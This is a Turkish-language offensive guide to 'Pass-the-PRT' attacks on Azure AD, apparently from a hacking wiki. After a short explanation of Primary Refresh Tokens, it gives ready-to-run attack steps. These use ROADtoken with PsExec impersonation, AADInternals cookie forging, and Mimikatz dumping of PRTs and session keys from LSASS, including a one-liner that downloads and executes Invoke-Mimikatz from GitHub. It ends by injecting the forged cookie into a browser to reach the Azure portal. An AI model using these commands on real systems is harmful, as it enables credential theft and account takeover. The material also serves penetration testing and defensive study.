Az - Pass the PRT

PRT Nedir

PRT'niz olup olmadığını kontrol edin

Dsregcmd.exe /status

SSO Durumu bölümünde, AzureAdPrt değerinin EVET olarak ayarlandığını görmelisiniz.

Aynı çıktıda, cihazın Azure'a katılıp katılmadığını da görebilirsiniz ( AzureAdJoined alanında):

PRT Çerezi

PRT çerezi aslında x-ms-RefreshTokenCredential olarak adlandırılır ve bir JSON Web Token (JWT) içerir. Bir JWT, 3 bölüm içerir: başlık, yük ve imza, . ile ayrılmış ve tümü url güvenli base64 ile kodlanmıştır. Tipik bir PRT çerezi aşağıdaki başlık ve gövdeyi içerir:

{
"alg": "HS256",
"ctx": "oYKjPJyCZN92Vtigt/f8YlVYCLoMu383"
}
{
"refresh_token": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAZ18nQkT-eD6Hqt7sf5QY0iWPSssZOto]<cut>VhcDew7XCHAVmCutIod8bae4YFj8o2OOEl6JX-HIC9ofOG-1IOyJegQBPce1WS-ckcO1gIOpKy-m-JY8VN8xY93kmj8GBKiT8IAA",
"is_primary": "true",
"request_nonce": "AQABAAAAAAAGV_bv21oQQ4ROqh0_1-tAPrlbf_TrEVJRMW2Cr7cJvYKDh2XsByis2eCF9iBHNqJJVzYR_boX8VfBpZpeIV078IE4QY0pIBtCcr90eyah5yAA"
}

Gerçek Primary Refresh Token (PRT), refresh_token içinde kapsüllenmiştir ve bu, Azure AD'nin kontrolündeki bir anahtar tarafından şifrelenmiştir, bu da içeriğini bizim için opak ve şifrelenemez hale getirir. is_primary alanı, bu token içinde birincil yenileme token'ının kapsüllendiğini belirtir. Çerezin, hedeflendiği belirli oturumla bağlı kalmasını sağlamak için, request_nonce logon.microsoftonline.com sayfasından iletilir.

TPM kullanarak PRT Çerez akışı

LSASS süreci, KDF bağlamını TPM'ye gönderecek ve TPM, session key (cihaz AzureAD'ye kaydedildiğinde toplanan ve TPM'de saklanan) ve önceki bağlamı kullanarak bir anahtar türetecek ve bu türetilmiş anahtar, PRT çerezini (JWT) imzalamak için kullanılacaktır.

KDF bağlamı, AzureAD'den bir nonce ve PRT'yi içeren bir JWT ile karıştırılmış bir bağlamdır (rastgele baytlar).

Bu nedenle, PRT TPM içinde bulunduğu için çıkarılamasa da, LSASS'ı kötüye kullanarak yeni bağlamlardan türetilmiş anahtarlar talep etmek ve üretilen anahtarları Çerezleri imzalamak için kullanmak mümkündür.

PRT Kötüye Kullanım Senaryoları

Normal bir kullanıcı olarak, LSASS'tan SSO verileri talep ederek PRT kullanımını talep etmek mümkündür. Bu, Web Hesap Yöneticisi (token broker) üzerinden token talep eden yerel uygulamalar gibi yapılabilir. WAM, talebi LSASS'a iletir ve LSASS, imzalı PRT beyanı kullanarak token talep eder. Ya da PRT çerezinin Azure AS giriş sayfalarına yapılan istekleri kimlik doğrulamak için header olarak kullanıldığı tarayıcı tabanlı (web) akışları ile yapılabilir.

SYSTEM olarak, eğer TPM tarafından korunmuyorsa PRT'yi çalabilir veya LSASS'ta PRT anahtarlarıyla etkileşimde bulunabilirsiniz.

Pass-the-PRT Saldırı Örnekleri

Saldırı - ROADtoken

Bu yöntem hakkında daha fazla bilgi için bu gönderiyi kontrol edin. ROADtoken, doğru dizinden BrowserCore.exe çalıştıracak ve bunu PRT çerezi elde etmek için kullanacaktır. Bu çerez daha sonra ROADtools ile kimlik doğrulamak ve kalıcı bir yenileme token'ı elde etmek için kullanılabilir.

Geçerli bir PRT çerezi oluşturmak için ihtiyacınız olan ilk şey bir nonce'dır. Bunu şu şekilde alabilirsiniz:

$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL = "https://login.microsoftonline.com/$TenantId/oauth2/token"

$Params = @{
"URI"     = $URL
"Method"  = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body $Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVbiSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA

Veya roadrecon kullanarak:

roadrecon auth prt-init

Sonra yeni bir PRT almak için roadtoken kullanabilirsiniz (saldırı için kullanıcının bir sürecinden aracı çalıştırın):

.\ROADtoken.exe <nonce>

Bir satırlık:

Invoke-Command - Session $ps_sess -ScriptBlock{C:\Users\Public\PsExec64.exe - accepteula -s "cmd.exe" " /c C:\Users\Public\SessionExecCommand.exe UserToImpersonate C:\Users\Public\ROADToken.exe AwABAAAAAAACAOz_BAD0__kdshsy61GF75SGhs_[...] > C:\Users\Public\PRT.txt"}

Ardından oluşturulan çerezi kullanarak token'lar oluşturabilir ve Azure AD Graph veya Microsoft Graph kullanarak giriş yapabilirsiniz:

# Generate
roadrecon auth --prt-cookie <prt_cookie>

# Connect
Connect-AzureAD --AadAccessToken <token> --AccountId <acc_ind>

Saldırı - roadrecon Kullanarak

Saldırı - AADInternals ve sızdırılmış PRT Kullanarak

Get-AADIntUserPRTToken kullanıcının PRT token'ını Azure AD bağlı veya Hibrit bağlı bilgisayardan alır. PRT token'ını almak için BrowserCore.exe kullanır.

# Get the PRToken
$prtToken = Get-AADIntUserPRTToken

# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken

Ya da Mimikatz'tan değerleriniz varsa, bir token oluşturmak için AADInternals'ı da kullanabilirsiniz:

# Mimikat "PRT" value
$MimikatzPRT="MC5BWU..."

# Add padding
while($MimikatzPrt.Length % 4) {$MimikatzPrt += "="}

# Decode
$PRT=[text.encoding]::UTF8.GetString([convert]::FromBase64String($MimikatzPRT))

# Mimikatz "Clear key" value
$MimikatzClearKey="37c5ecdfeab49139288d8e7b0732a5c43fac53d3d36ca5629babf4ba5f1562f0"

# Convert to Byte array and B64 encode
$SKey = [convert]::ToBase64String( [byte[]] ($MimikatzClearKey -replace '..', '0x$&,' -split ',' -ne ''))

# Generate PRTToken with Nonce
$prtToken = New-AADIntUserPRTToken -RefreshToken $PRT -SessionKey $SKey -GetNonce
$prtToken
## You can already use this token ac cookie in the browser

# Get access token from prtToken
$AT = Get-AADIntAccessTokenForAzureCoreManagement -PRTToken $prtToken

# Verify access and connect with Az. You can see account id in mimikatz prt output
Connect-AzAccount -AccessToken $AT -TenantID <tenant-id> -AccountId <acc-id>

https://login.microsoftonline.com adresine gidin, login.microsoftonline.com için tüm çerezleri temizleyin ve yeni bir çerez girin.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

Sonra https://portal.azure.com adresine gidin.

Saldırı - Mimikatz

Adımlar

1. PRT (Birincil Yenileme Token'ı) LSASS'tan (Yerel Güvenlik Otoritesi Alt Sistem Servisi) çıkarılır ve sonraki kullanım için saklanır.

2. Oturum Anahtarı daha sonra çıkarılır. Bu anahtar başlangıçta verildiği ve ardından yerel cihaz tarafından yeniden şifrelenmesi gerektiğinden, bir DPAPI anahtarını kullanarak şifre çözme gerektirir. DPAPI (Veri Koruma API) hakkında ayrıntılı bilgi bu kaynaklarda bulunabilir: HackTricks ve uygulamasını anlamak için Pass-the-cookie attack sayfasına bakabilirsiniz.

3. Oturum Anahtarı şifresi çözüldükten sonra, PRT için türetilmiş anahtar ve bağlam elde edilir. Bunlar PRT çerezi oluşturmak için kritik öneme sahiptir. Özellikle, türetilmiş anahtar, çerezi oluşturan JWT'yi (JSON Web Token) imzalamak için kullanılır. Bu sürecin kapsamlı bir açıklaması Dirk-jan tarafından sağlanmıştır, buradan erişebilirsiniz.

Bu ayrıntıları çıkarmak için gerçekleştirilen sürecin derinlemesine açıklamasını burada bulabilirsiniz: https://dirkjanm.io/digging-further-into-the-primary-refresh-token/

mimikatz kullanarak PRT'yi çıkarabilirsiniz:

mimikatz.exe
Privilege::debug
Sekurlsa::cloudap

# Or in powershell
iex (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::cloudap"'

(Images from https://blog.netwrix.com/2023/05/13/pass-the-prt-overview)

Prt olarak etiketlenmiş kısmı kopyalayın ve kaydedin. Ayrıca aşağıda vurgulanan ProofOfPossesionKey alanının KeyValue kısmını içeren oturum anahtarını da çıkarın. Bu şifrelenmiştir ve bunu çözmek için DPAPI anahtarlarımıza ihtiyacımız olacak.

Oturum anahtarını şifrelemek için yetkilerinizi SYSTEM seviyesine yükseltmeniz gerekiyor, böylece bilgisayar bağlamında çalışarak DPAPI anahtarını kullanarak şifreleyebilirsiniz. Bunu yapmak için aşağıdaki komutları kullanabilirsiniz:

token::elevate
dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE] /unprotect

Seçenek 1 - Tam Mimikatz

• Şimdi hem Context değerini kopyalamak istiyorsunuz:

• Hem de türetilmiş anahtar değerini:

• Son olarak, bu bilgileri PRT çerezleri oluşturmak için kullanabilirsiniz:

Dpapi::cloudapkd /context:[CONTEXT] /derivedkey:[DerivedKey] /Prt:[PRT]

• https://login.microsoftonline.com adresine gidin, login.microsoftonline.com için tüm çerezleri temizleyin ve yeni bir çerez girin.

Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
Path: /
HttpOnly: Set to True (checked)

• Sonra https://portal.azure.com adresine gidin.

Seçenek 2 - roadrecon kullanarak PRT

• Öncelikle PRT'yi yenileyin, bu roadtx.prt dosyasına kaydedilecektir:

roadtx prt -a renew --prt <PRT From mimikatz> --prt-sessionkey <clear key from mimikatz>

• Artık roadtx browserprtauth ile etkileşimli tarayıcı kullanarak token talep edebiliriz. roadtx describe komutunu kullanırsak, erişim tokeninin bir MFA talebi içerdiğini görürüz çünkü bu durumda kullandığım PRT de bir MFA talebine sahipti.

roadtx browserprtauth
roadtx describe < .roadtools_auth

Seçenek 3 - roadrecon türetilmiş anahtarlar kullanarak

Mimikatz tarafından dökülen bağlam ve türetilmiş anahtar ile, yeni bir imzalı çerez oluşturmak için roadrecon kullanmak mümkündür:

roadrecon auth --prt-cookie <cookie> --prt-context <context> --derives-key <derived key>

Referanslar

• https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-prt/

• https://dirkjanm.io/abusing-azure-ad-sso-with-the-primary-refresh-token/

• https://www.youtube.com/watch?v=x609c-MUZ_g